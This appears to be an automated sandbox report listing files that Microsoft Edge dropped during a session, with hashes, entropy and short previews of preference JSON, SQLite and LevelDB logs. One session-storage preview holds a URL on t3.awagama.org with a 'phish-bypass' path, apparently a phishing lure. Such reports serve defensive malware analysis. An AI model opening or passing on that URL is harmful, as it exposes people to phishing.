                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40
                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20480
                                                                                                                                              Entropy (8bit):0.5743529459392946
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isCHIrdNG7fdjxHIXOFSY:TLSOUOq0afDdWec9sJKG7zo7J5fc
                                                                                                                                              MD5:558A3F8C86B4E6580B54E8F7FA7E3DAF
                                                                                                                                              SHA1:BE2CA20287B762D66037530A721A825786816845
                                                                                                                                              SHA-256:4821B776B0FDC4190DB1B261174F6C2D664DD45F3C0D77FE359D7B63FF64609C
                                                                                                                                              SHA-512:BF743179D9448C8BF2256EEA447CD43FB1440C620CD57F8C72A71BED0995F2590FAE177426AF38211E9ADEADD3A0A023AAFA91517907F1AFF5F3A7794CBFD143
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12137
                                                                                                                                              Entropy (8bit):5.191769766949962
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:stMJ9pQTryZigaba4uyvso3O2hjkx3a88bV+F90XQAkslP9YJ:stMLA3ugso33TbGiXQNsc
                                                                                                                                              MD5:2560E9ECEE22BEACEED07E4CFB7BF632
                                                                                                                                              SHA1:67129DE158AA58016DAC4C81A3A57A26411986E9
                                                                                                                                              SHA-256:49EB580B5968C3BE8C76A610ADAC458E44DCE9F3DC2866A8058ECDC987306331
                                                                                                                                              SHA-512:ABEE95F5AF04DC913F33147BE0AAE52952D1FDA36DEBDE7A4FDC933CD1CF142CF1491FD1D2190EB3285F9FBF3857F6E619F946AC9D4D54339A555D0CA93B27CA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380395637437285","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12137
                                                                                                                                              Entropy (8bit):5.191769766949962
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:stMJ9pQTryZigaba4uyvso3O2hjkx3a88bV+F90XQAkslP9YJ:stMLA3ugso33TbGiXQNsc
                                                                                                                                              MD5:2560E9ECEE22BEACEED07E4CFB7BF632
                                                                                                                                              SHA1:67129DE158AA58016DAC4C81A3A57A26411986E9
                                                                                                                                              SHA-256:49EB580B5968C3BE8C76A610ADAC458E44DCE9F3DC2866A8058ECDC987306331
                                                                                                                                              SHA-512:ABEE95F5AF04DC913F33147BE0AAE52952D1FDA36DEBDE7A4FDC933CD1CF142CF1491FD1D2190EB3285F9FBF3857F6E619F946AC9D4D54339A555D0CA93B27CA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380395637437285","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12137
                                                                                                                                              Entropy (8bit):5.191769766949962
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:stMJ9pQTryZigaba4uyvso3O2hjkx3a88bV+F90XQAkslP9YJ:stMLA3ugso33TbGiXQNsc
                                                                                                                                              MD5:2560E9ECEE22BEACEED07E4CFB7BF632
                                                                                                                                              SHA1:67129DE158AA58016DAC4C81A3A57A26411986E9
                                                                                                                                              SHA-256:49EB580B5968C3BE8C76A610ADAC458E44DCE9F3DC2866A8058ECDC987306331
                                                                                                                                              SHA-512:ABEE95F5AF04DC913F33147BE0AAE52952D1FDA36DEBDE7A4FDC933CD1CF142CF1491FD1D2190EB3285F9FBF3857F6E619F946AC9D4D54339A555D0CA93B27CA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380395637437285","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):37816
                                                                                                                                              Entropy (8bit):5.556188927869588
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:DBdt397pLGLhDFWP2EfmL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZKF6Jrwq66yDdi:DBdt3rchDFWP2EfmLu1jac066q66wht+
                                                                                                                                              MD5:7EF88EF2C52F8DA18563B5B69078D138
                                                                                                                                              SHA1:B47D7C01C3E2B8198D58D30D741796B83FCC851D
                                                                                                                                              SHA-256:2DCBF96F202CFEABBF9656F0E7D3BFFED9451FCA4C00548D1714D461AB1C3742
                                                                                                                                              SHA-512:267F6B335257F86294ACDE515FCC43E42973F152C1560E426D1EF61AD327170853CA3F1198211A2E164307C985E089746A39B321552D6335CED31DF6DDD47D36
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380395637045030","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380395637045030","location":5,"ma
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):37816
                                                                                                                                              Entropy (8bit):5.556188927869588
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:DBdt397pLGLhDFWP2EfmL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZKF6Jrwq66yDdi:DBdt3rchDFWP2EfmLu1jac066q66wht+
                                                                                                                                              MD5:7EF88EF2C52F8DA18563B5B69078D138
                                                                                                                                              SHA1:B47D7C01C3E2B8198D58D30D741796B83FCC851D
                                                                                                                                              SHA-256:2DCBF96F202CFEABBF9656F0E7D3BFFED9451FCA4C00548D1714D461AB1C3742
                                                                                                                                              SHA-512:267F6B335257F86294ACDE515FCC43E42973F152C1560E426D1EF61AD327170853CA3F1198211A2E164307C985E089746A39B321552D6335CED31DF6DDD47D36
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380395637045030","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380395637045030","location":5,"ma
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):321
                                                                                                                                              Entropy (8bit):4.124013012180063
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:S85aEFljljljljlKUpla4gTHnEZNQVdsEEE:S+a8ljljljljlKsngznLL
                                                                                                                                              MD5:463923DA6BF95D7721CAB7A2D1CB8DDD
                                                                                                                                              SHA1:1896A575E7D182961B5B49BC8BF732A84182CE10
                                                                                                                                              SHA-256:5D865BC525E135D2766164A8EE2CDF0BE0FA43E0DF4B74E908A180929DB47E6F
                                                                                                                                              SHA-512:25374C5D21A4A01E5BA112BF67E0E391D5E1EF684994D8BDADD4A7A0A36FF4B2044CD2D89FFBC93BE672DCD5CD6478C1F38097014AC96784B3AB81089A7212AA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............|.+ae................next-map-id.1.Fnamespace-841bb058_f4a2_4c34_b2ca_d7fd092b8ea9-https://t3.awagama.org/.0V.e................V.e................V.e................V.e................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):320
                                                                                                                                              Entropy (8bit):5.159003930541841
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEsq2PRN23oH+TcwtrQMxIFUtfEgZmw5EaoPkwORN23oH+TcwtrQMFLJ:7V5vaYebCFUtf5/5xA5JYebtJ
                                                                                                                                              MD5:48F3C86A7ABD5F78832A121FCDF7B4F1
                                                                                                                                              SHA1:6A03967EA6AC7A5CBB89938402DDC5420B0887A2
                                                                                                                                              SHA-256:F109BAF2F7CDAE099C4D91D2FEE0DBED8BA06005BA04B42E96EAC847286F0247
                                                                                                                                              SHA-512:27A21B8AB29223B50B204505933BD07A9DEBEC3CB02AB8187B740C9973D60195A342FF33CD1E4581AB817C275DD2201C90D9BB8036EB2A40A4DF967EAB34EA0F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.486 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/03-11:33:57.489 1e54 Recovering log #3.2025/01/03-11:33:57.493 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):320
                                                                                                                                              Entropy (8bit):5.159003930541841
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEsq2PRN23oH+TcwtrQMxIFUtfEgZmw5EaoPkwORN23oH+TcwtrQMFLJ:7V5vaYebCFUtf5/5xA5JYebtJ
                                                                                                                                              MD5:48F3C86A7ABD5F78832A121FCDF7B4F1
                                                                                                                                              SHA1:6A03967EA6AC7A5CBB89938402DDC5420B0887A2
                                                                                                                                              SHA-256:F109BAF2F7CDAE099C4D91D2FEE0DBED8BA06005BA04B42E96EAC847286F0247
                                                                                                                                              SHA-512:27A21B8AB29223B50B204505933BD07A9DEBEC3CB02AB8187B740C9973D60195A342FF33CD1E4581AB817C275DD2201C90D9BB8036EB2A40A4DF967EAB34EA0F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.486 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/03-11:33:57.489 1e54 Recovering log #3.2025/01/03-11:33:57.493 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1559
                                                                                                                                              Entropy (8bit):4.1351000513564395
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:379utL1lolBCXvNp+IMrXiBJOIlyM0T2l/FzNp+IMd:374tLvcyTKsJOIETa9nk
                                                                                                                                              MD5:34E920A5D824B4595F61791A5C874737
                                                                                                                                              SHA1:C2994CEBFC85995AEA47BE83B7451252E3CB3772
                                                                                                                                              SHA-256:6BCFD7AB7BBF692972A8B2BE57E360A3B8D0275600D2769A4307A8CDCCD534CB
                                                                                                                                              SHA-512:8088AA84A8047E3379556880D36AB0ADDA872869BE9921880E8A95772B82890433D4B65382A03630DEF86BD01DC9771E7DCE8101B4185D11D7A84AFEF4B67EB3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SNSS........X}%............X}%......".X}%............X}%........X}%........X}%........X}%....!...X}%................................X}%.X}%1..,....X}%$...841bb058_f4a2_4c34_b2ca_d7fd092b8ea9....X}%........X}%......J.........X}%....X}%........................X}%....................5..0....X}%&...{544A81F3-86CF-4601-B565-C8CB2CA3983A}......X}%........X}%........................X}%............X}%....{...https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4.....,...(...!... .....................................................................................................x..*....x..*..................................0...................................................{...h.t.t.p.s.:././.t.3...a.w.a.g.a.m.a...o.r.g./.c.d.n.-.c.g.i./.p.h.i.s.h.-.b.y.p.a.s.s.?.a.t.o.k.=.5.C.x.X.R.y.3.g.I.X.Y.B.S.Z.x.Q.Y.j.r.6.W.U.a.g.w.E.O.F.F.l.A.0.I.N.6.2.C.H.h.p.D.X.0.-.1.7.3.5.9.2.2.0.0.3.-.0...0...1...1.-.%.2.F.m.i.m.a...m.p.4.......
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20480
                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):345
                                                                                                                                              Entropy (8bit):5.107361351165824
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEiF5q2PRN23oH+Tcwt7Uh2ghZIFUtfEiFEZmw5ECkwORN23oH+Tcwt7Uh2gnd:7Vj5vaYebIhHh2FUtfjE/575JYebIhHd
                                                                                                                                              MD5:22C1AB9232529FEDD3F772330CD9C65F
                                                                                                                                              SHA1:80D343B9DDA902C6655A232FEEBF650CAB7F7E59
                                                                                                                                              SHA-256:ADF9C05513E5E8F41A25BFEC83873A142D1D3E0EAF88AAC72DF6F5620C62D688
                                                                                                                                              SHA-512:906E92788F923631C7FCDC519F039E235F283DCF4D7302723C0737C5DC1CBC80EB0EE381283181E9815ADD6164C9D6F7056000AF7626254BB5D016EC0D3B3B02
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.080 e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/03-11:33:57.080 e44 Recovering log #3.2025/01/03-11:33:57.081 e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):345
                                                                                                                                              Entropy (8bit):5.107361351165824
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEiF5q2PRN23oH+Tcwt7Uh2ghZIFUtfEiFEZmw5ECkwORN23oH+Tcwt7Uh2gnd:7Vj5vaYebIhHh2FUtfjE/575JYebIhHd
                                                                                                                                              MD5:22C1AB9232529FEDD3F772330CD9C65F
                                                                                                                                              SHA1:80D343B9DDA902C6655A232FEEBF650CAB7F7E59
                                                                                                                                              SHA-256:ADF9C05513E5E8F41A25BFEC83873A142D1D3E0EAF88AAC72DF6F5620C62D688
                                                                                                                                              SHA-512:906E92788F923631C7FCDC519F039E235F283DCF4D7302723C0737C5DC1CBC80EB0EE381283181E9815ADD6164C9D6F7056000AF7626254BB5D016EC0D3B3B02
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.080 e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/03-11:33:57.080 e44 Recovering log #3.2025/01/03-11:33:57.081 e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):270336
                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):270336
                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):430
                                                                                                                                              Entropy (8bit):5.212596585710403
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7VsP1vaYebvqBQFUtfg/5JU5JYebvqBvJ:7VaaYebvZgf2JeJYebvk
                                                                                                                                              MD5:06E03D99A3A69E8D1CD3EC8AA74D76BB
                                                                                                                                              SHA1:9E5EAB19592B6410E56CBDBE9CD9A26DB3F34237
                                                                                                                                              SHA-256:B0E2B58F292DB877898FDDC9C91DF1273390FA66828FE5DD120BEF2B79EF97E7
                                                                                                                                              SHA-512:08B2F5824D943891892186585EF5BC5AF3A4F1F1327EBE03A02AE30611B301529E5F82835C239FCE7B6628C783B16664767041B406A60D5DFDB6871D38A72C96
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.544 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/03-11:33:57.547 1e54 Recovering log #3.2025/01/03-11:33:57.556 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):430
                                                                                                                                              Entropy (8bit):5.212596585710403
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7VsP1vaYebvqBQFUtfg/5JU5JYebvqBvJ:7VaaYebvZgf2JeJYebvk
                                                                                                                                              MD5:06E03D99A3A69E8D1CD3EC8AA74D76BB
                                                                                                                                              SHA1:9E5EAB19592B6410E56CBDBE9CD9A26DB3F34237
                                                                                                                                              SHA-256:B0E2B58F292DB877898FDDC9C91DF1273390FA66828FE5DD120BEF2B79EF97E7
                                                                                                                                              SHA-512:08B2F5824D943891892186585EF5BC5AF3A4F1F1327EBE03A02AE30611B301529E5F82835C239FCE7B6628C783B16664767041B406A60D5DFDB6871D38A72C96
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.544 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/03-11:33:57.547 1e54 Recovering log #3.2025/01/03-11:33:57.556 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
